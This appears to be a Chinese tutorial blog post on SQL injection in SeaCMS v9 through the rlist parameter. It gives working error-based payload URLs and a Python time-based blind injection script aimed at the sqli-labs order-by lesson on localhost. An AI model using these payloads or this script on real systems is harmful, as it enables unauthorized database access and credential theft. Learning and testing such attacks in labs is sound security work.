seacmsv9注入管理员账号密码+orderby+limit

seacmsv9存在SQL注入漏洞,漏洞文件是./comment/api/index.php,在网页代码中找到用户提交的rlist参数,攻击者可以在rlist参数处注入SQL代码,构造恶意rlist参数

复制代码
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`
复制代码
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,database())),@`%27`

输入?sort=rand(true)和?sort=rand(false)时,页面排序结果不同,则看通过构造条件表达式来出发不同的回显。

复制代码
 import requests
 import time
 ​
 def inject_database(url):
     name = ''
     for i in range(1, 20):
         low = 32
         high = 128
         mid = (low + high) // 2
         while low < high:
             # 构造时间盲注payload
             payload = "if((ascii(substr(database(),%d,1))>%d),sleep(1),1)" % (i, mid)
             # 传参
             params = {"sort": payload}
             start_time = time.time()
             # 异常处理
             try:
                 r = requests.get(url, params=params, timeout=20)
             except requests.Timeout:
                 print("Request timed out.")
                 continue
             end_time = time.time()
             if end_time - start_time >= 1:
                 low = mid + 1
             else:
                 high = mid
             mid = (low + high) // 2
         if mid == 32:
             break
         name += chr(mid)
         print(name)
 ​
 ​
 if __name__ == "__main__":
     url = 'http://127.0.0.1/sqli-labs-php7/Less-46/index.php'
     inject_database(url)
 ​
相关推荐
极限实验室1 小时前
如何使用 Nginx 代理 Easysearch 服务
数据库·nginx
whn19771 小时前
selectdb修改表副本
数据库
TDengine (老段)2 小时前
TDengine 中的视图
数据库·物联网·oracle·时序数据库·tdengine·iotdb
Kyrie_Li2 小时前
Redis-Sentinel(哨兵模式)
数据库·redis·sentinel
计算机毕设定制辅导-无忧学长3 小时前
TDengine 数据写入优化:协议选择与批量操作(一)
网络·数据库·tdengine
Mr.洛 白3 小时前
OpenEuler/CentOS一键部署OpenGauss数据库教程(脚本+视频)
数据库·opengauss·gaussdb·国产数据库安装·安装脚本
计算机毕设定制辅导-无忧学长3 小时前
TDengine 快速上手:安装部署与基础 SQL 实践(一)
大数据·sql·tdengine
炬火初现4 小时前
redis-cpp-cpp如何使用lua脚本
数据库·redis·lua
hxung4 小时前
Redis 数据类型详解
数据库·redis·缓存
oh,huoyuyan4 小时前
火语言RPA--Sqlite-导入数据表格
数据库·sqlite·rpa